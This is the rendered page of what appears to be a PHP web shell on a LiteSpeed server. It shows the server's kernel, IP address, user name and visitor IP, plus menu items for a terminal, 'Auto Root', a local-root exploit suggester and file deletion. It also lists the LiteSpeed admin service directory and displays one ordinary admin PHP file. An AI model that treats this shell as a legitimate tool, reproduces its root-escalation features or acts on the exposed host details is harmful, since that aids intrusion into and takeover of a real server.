Linux 162-55-97-189.cprapid.com 5.14.0-687.24.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 9 18:14:06 EDT 2026 x86_64
LiteSpeed
Server IP : 162.55.97.189 & Your IP : 216.73.216.182
Domains :
Cant Read [ /etc/named.conf ]
User : kavci
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
lsws /
admin /
html.6.3.5 /
service /
Delete
Unzip
Name
Size
Permission
Date
Action
blockip_html.php
648
B
-rw-r--r--
2026-07-11 07:57
graph_html.php
7.04
KB
-rw-r--r--
2026-07-11 07:57
graph_xml.php
3.21
KB
-rw-r--r--
2026-07-11 07:57
homeCont.php
5.3
KB
-rw-r--r--
2026-07-11 07:57
logViewer.php
2.1
KB
-rw-r--r--
2026-07-11 07:57
realtimeReport.php
11.44
KB
-rw-r--r--
2026-07-11 07:57
realtimeReqReport.php
6.89
KB
-rw-r--r--
2026-07-11 07:57
restart.html
634
B
-rw-r--r--
2026-07-11 07:57
serviceMgr.php
2.07
KB
-rw-r--r--
2026-07-11 07:57
verMgrCont.php
3.42
KB
-rw-r--r--
2026-07-11 07:57
verMgrDownload.php
525
B
-rw-r--r--
2026-07-11 07:57
Save
Rename
<?php require_once('../includes/auth.php'); $stats = new STATS(); $stats->parse_all(); $blocked_count = count($stats->blocked_ip); $help_key = 'antiddos_blocked_ip'; $dhelp_item = DATTR_HELP::GetInstance()->GetItem($help_key); $help = '  ' . $dhelp_item->render($help_key); echo GUI::header(); ?> <table class="xtbl" width="100%" border="0" cellpadding="4" cellspacing="1"> <tr height="15"><td class="xtbl_title">Current Blocked IP List (Total <?php echo $blocked_count . ')' . $help; ?> </tr> <tr class="xtbl_value"><td> <?php echo join(', ', $stats->blocked_ip); ?> </td></tr> </table> <?php echo GUI::footer();